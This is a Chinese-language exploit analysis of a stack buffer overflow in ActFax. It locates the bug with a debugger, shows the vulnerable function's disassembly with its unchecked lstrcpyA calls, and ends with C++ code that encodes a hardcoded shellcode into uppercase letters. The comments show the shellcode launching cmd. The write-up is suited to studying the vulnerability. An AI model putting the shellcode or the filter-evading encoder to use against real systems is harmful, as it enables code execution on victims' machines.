漏洞来源:http://www.exploit-db.com/exploits/16176/
bug函数定位
在004A4B7D下断点,运行程序(F9),调用漏洞利用程序,
这时程序断在004A4B7D 这里,看堆栈,找到返回程序领空的返回地址。这里一直往下翻,找栈回溯。要翻很远。才能找到一个堆栈的返回地址。
这里我找到
在call处下断点
重新启动程序,然后启动poc程序,程序断在call处。
Ctrl+F8运行
等一会,程序断在了004A4B7D
按小键盘上的“-”减号
出现代码如图所示
选中call一行,直接回车,来到0046CEA0处。即为导致溢出的函数。
- Bug函数分析
0046CEA0 /$ 81EC 00020000 sub esp,0x200
0046CEA6 |. 8B8424 080200>mov eax,dword ptr ss:[esp+0x208]
0046CEAD |. 53 push ebx
0046CEAE |. 8B9C24 140200>mov ebx,dword ptr ss:[esp+0x214]
0046CEB5 |. 55 push ebp
0046CEB6 |. 56 push esi
0046CEB7 |. 8B35 94C35100 mov esi,dword ptr ds:[<&KERNEL32.lstrcpy>; kernel32.lstrcpyA
0046CEBD |. 57 push edi
0046CEBE |. 8BBC24 240200>mov edi,dword ptr ss:[esp+0x224]
0046CEC5 |. 68 68FE5300 push ActFax.0053FE68 ; /String2 = ""
0046CECA |. 50 push eax ; |String1
0046CECB |. C707 00000000 mov dword ptr ds:[edi],0x0 ; |
0046CED1 |. C703 00000000 mov dword ptr ds:[ebx],0x0 ; |
0046CED7 |. FFD6 call esi ; \lstrcpyA
0046CED9 |. 8BAC24 1C0200>mov ebp,dword ptr ss:[esp+0x21C]
0046CEE0 |. 68 68FE5300 push ActFax.0053FE68 ; /String2 = ""
0046CEE5 |. 55 push ebp ; |String1
0046CEE6 |. FFD6 call esi ; \lstrcpyA
0046CEE8 |. 8B8C24 140200>mov ecx,dword ptr ss:[esp+0x214]
0046CEEF |. 8D9424 100100>lea edx,dword ptr ss:[esp+0x110]
0046CEF6 |. 51 push ecx ; /String2
0046CEF7 |. 52 push edx ; |String1
0046CEF8 |. FFD6 call esi ; \lstrcpyA
0046CEFA |. 8D8424 100100>lea eax,dword ptr ss:[esp+0x110]
0046CF01 |. 50 push eax
0046CF02 |. E8 D94A0900 call ActFax.005019E0
0046CF07 |. A1 84865200 mov eax,dword ptr ds:[0x528684]
0046CF0C |. 83C4 04 add esp,0x4
0046CF0F |. 85C0 test eax,eax
0046CF11 |. 75 40 jnz XActFax.0046CF53
0046CF13 |. 8D4C24 10 lea ecx,dword ptr ss:[esp+0x10]
0046CF17 |. 68 88865200 push ActFax.00528688
0046CF1C |. 51 push ecx
0046CF1D |. FFD6 call esi
0046CF1F |. 8D5424 10 lea edx,dword ptr ss:[esp+0x10]
0046CF23 |. 52 push edx
0046CF24 |. E8 B74A0900 call ActFax.005019E0
0046CF29 |. 83C4 04 add esp,0x4
0046CF2C |. 8D4424 10 lea eax,dword ptr ss:[esp+0x10]
0046CF30 |. 8D8C24 100100>lea ecx,dword ptr ss:[esp+0x110]
0046CF37 |. 50 push eax ; /String2
0046CF38 |. 51 push ecx ; |String1
0046CF39 |. FF15 34C35100 call dword ptr ds:[<&KERNEL32.lstrcmpA>] ; \lstrcmpA
0046CF3F |. 85C0 test eax,eax
0046CF41 |. 75 10 jnz XActFax.0046CF53
0046CF43 |. 5F pop edi
0046CF44 |. 5E pop esi
0046CF45 |. 5D pop ebp
0046CF46 |. B8 01000000 mov eax,0x1
0046CF4B |. 5B pop ebx
0046CF4C |. 81C4 00020000 add esp,0x200
0046CF52 |. C3 retn
0046CF53 |> \A1 88875200 mov eax,dword ptr ds:[0x528788]
0046CF58 |. 85C0 test eax,eax
0046CF5A |. 74 52 je XActFax.0046CFAE
0046CF5C |. 8B35 DC385400 mov esi,dword ptr ds:[0x5438DC]
0046CF62 |. 85F6 test esi,esi
0046CF64 |. 74 48 je XActFax.0046CFAE
0046CF66 |> 6A 00 /push 0x0
0046CF68 |. 8D5424 14 |lea edx,dword ptr ss:[esp+0x14]
0046CF6C |. 68 00010000 |push 0x100
0046CF71 |. 52 |push edx
0046CF72 |. 6A 01 |push 0x1
0046CF74 |. 6A 01 |push 0x1
0046CF76 |. 56 |push esi
0046CF77 |. E8 944C0100 |call ActFax.00481C10
0046CF7C |. 83C4 18 |add esp,0x18
0046CF7F |. 85C0 |test eax,eax
0046CF81 |. 74 24 |je XActFax.0046CFA7
0046CF83 |. 8D4424 10 |lea eax,dword ptr ss:[esp+0x10]
0046CF87 |. 50 |push eax
0046CF88 |. E8 534A0900 |call ActFax.005019E0
0046CF8D |. 83C4 04 |add esp,0x4
0046CF90 |. 8D4C24 10 |lea ecx,dword ptr ss:[esp+0x10]
0046CF94 |. 8D9424 100100>|lea edx,dword ptr ss:[esp+0x110]
0046CF9B |. 51 |push ecx ; /String2
0046CF9C |. 52 |push edx ; |String1
0046CF9D |. FF15 34C35100 |call dword ptr ds:[<&KERNEL32.lstrcmpA>] ; \lstrcmpA
0046CFA3 |. 85C0 |test eax,eax
0046CFA5 |. 74 17 |je XActFax.0046CFBE
0046CFA7 |> 8B76 20 |mov esi,dword ptr ds:[esi+0x20]
0046CFAA |. 85F6 |test esi,esi
0046CFAC |.^ 75 B8 \jnz XActFax.0046CF66
0046CFAE |> A1 84865200 mov eax,dword ptr ds:[0x528684]
0046CFB3 |. 5F pop edi
0046CFB4 |. 5E pop esi
0046CFB5 |. 5D pop ebp
0046CFB6 |. 5B pop ebx
0046CFB7 |. 81C4 00020000 add esp,0x200
0046CFBD |. C3 retn
在程序里面利用了大量strcpy函数,并且没有对参数进行检查,导致漏洞产生。程序在0046CEF8 处调用strcpy函数,导致返回地址被覆盖。
0046CEE8 |. 8B8C24 140200>mov ecx,dword ptr ss:[esp+0x214]
0046CEEF |. 8D9424 100100>lea edx,dword ptr ss:[esp+0x110]
0046CEF6 |. 51 push ecx ; /String2
0046CEF7 |. 52 push edx ; |String1
0046CEF8 |. FFD6 call esi ; \lstrcpyA
0046CEFA |. 8D8424 100100>lea eax,dword ptr ss:[esp+0x110]
0046CF01 |. 50 push eax
- Bug利用
转:http://www.7747.net/kf/201012/80407.html
算法描述:将字符取前、后4位各加上一个key(例如0x41),分解为两个字符。
shellcode字符范围为0x00 - 0xFF 为2^8 = 256个字符,每个字符拆解过后的两个部分取值范围为2^4 = 16 = 0x10
加上一个适当的key,以0x41为例每个部分取值范围为0x41 - 0x51 即为ascii码的A - Q,所以全部是A-Q的大写字母。
当然,在会被转换成小写的时候(如Cmail hello 溢出漏洞),选用0x61为key,就得到全小写字母的字符范围。
算法代码示例(C++)
base16.cpp:
#include <stdio.h>
typedef struct _Byte_base16
{
unsigned o1 : 4;
unsigned o0 : 4;
}Byte_base16, *PByte_base16;
unsigned char shellcode[] =
"\x33\xC0" // xor eax, eax
"\x66\xB8\x72\x74" // mov ax, 7472
"\x50" // push eax
"\x68\x6D\x73\x76\x63" // push 6376736D
"\x54" // push esp
"\xB8\xcf\x05\xe7\x77" // mov eax, 0x77e705cf
"\xFF\xD0" // call eax
"\x99" // cdq
"\x66\xBA\x63\x6D" // mov dx, 6D63
"\x52" // push edx
"\xC6\x44\x24\x02\x64" // mov byte ptr [esp+2], 64
"\x54" // push esp
"\xB8\xbf\x8e\x01\x78" // mov eax, 0x78018ebf
"\xFF\xD0" // call eax
"\x99" // cdq
"\x52" // push edx
"\xB8\x1a\xe0\xe6\x77" // mov eax, 0x77e6e01a
"\xFF\xD0"; // call eax
int main(int argc,char* argv[])
{
unsigned char key = 0x41; //key to base16
PByte_base16 p;
int i = 0;
while(shellcode[i])
{
p = (PByte_base16)(&shellcode[i++]);
printf("%c%c",p->o0 + key,p->o1 + key);
}
return 0;
}
poc
16176.rar
漏洞程序
actfax_setup_en.part1.rar
actfax_setup_en.part2.rar
actfax_setup_en.part3.rar
actfax_setup_en.part4.rar
字母shellcode资料
alpha2.rar
黑防2008.4.rar